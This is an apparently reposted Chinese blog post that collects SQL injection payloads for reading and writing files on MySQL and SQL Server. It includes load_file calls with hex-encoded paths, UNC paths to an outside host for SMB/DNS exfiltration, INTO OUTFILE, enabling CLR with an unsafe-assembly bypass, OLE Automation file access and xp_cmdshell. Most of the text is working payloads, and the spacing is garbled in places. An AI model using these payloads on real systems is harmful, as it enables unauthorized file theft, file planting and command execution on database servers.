首页 » 漏洞 » SQL注入中的文件读写总结

SQL注入中的文件读写总结

 

读文件

常见的读文件,可以用16进制代替字符串 selectload_file('c:/boot.ini')selectload_file(0x633a2f626f6f742e696e69)selectload_file('//ecma.io/1.txt') # smb协议selectload_file('////ecma.io//1.txt') # 可用于DNS隧道 写文件 已知唯一的写文件的方式 select 0x313233 intooutfile 'D:/1.txt' 二、 SQL Server 读文件 1. BULK INSERT createtableresult(resvarchar(8000));bulkinsertresultfrom 'd:/1.txt'; 2. CLR集成 // 开启CLR集成execsp_configure 'show advanced options',1;reconfigure;execsp_configure 'clr enabled',1reconfigure createassemblysqbfrom 'd:/1.exe' withpermission_set=unsafe 上面一句可以利用 create assembly 函数从远程服务器加载任何 .NET 二进制文件到数据库中; 但是他会验证是否为合法 .NET 程序 ,导致失败, 下面是读取方式 selectmaster.dbo.fn_varbintohexstr(cast(contentas varbinary)) fromsys.assembly_files 绕过,首先加载一个有效的 .NET 的二进制文件,然后追加文件即可, 下面是绕过方法 。 createassemblysqbfrom 'd:/net.exe';alterassemblysqbaddfilefrom 'd:/1.txt'alterassemblysqbaddfilefrom 'd:/notnet.exe' 3. Script.FileSystemObject # 开启Ole Automation Procedures sp_configure 'show advanced options',1;RECONFIGURE;sp_configure 'Ole Automation Procedures',1;RECONFIGURE; declare @o int, @f int, @t int, @retintdeclare @linevarchar(8000)execsp_oacreate 'scripting.filesystemobject',@o outexecsp_oamethod @o, 'opentextfile', @f out, 'd:/1.txt', 1exec @ret = sp_onmethod @f, 'readline', @lineoutwhile(@ret = 0) beginprint @lineexec @ret = sp_oamethod @f, 'readline', @lineoutend 写文件 1. Script.FileSystemObject declare @o int, @f int, @t int, @retintdeclare @linevarchar(8000)execsp_oacreate 'scripting.filesystemobject',@o outexecsp_oamethod @o, 'createtextfile', @f out, 'e:/1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string' 2. BCP复制文件(测试失败,无 bcp.exe ) c:/windows>system32>bcp "select name from sysobjects" querytestout.txt -c -s 127.0.0.1 -U sa -p"sa"3. xp_cmdshell execxp_cmdshell 'echo test>d:/1.txt'三、Oracle pass ,Oracle太坑了~~~几乎都受到 PL/SQL 的限制,暂时不讨论

原文链接:SQL注入中的文件读写总结,转载请注明来源!

0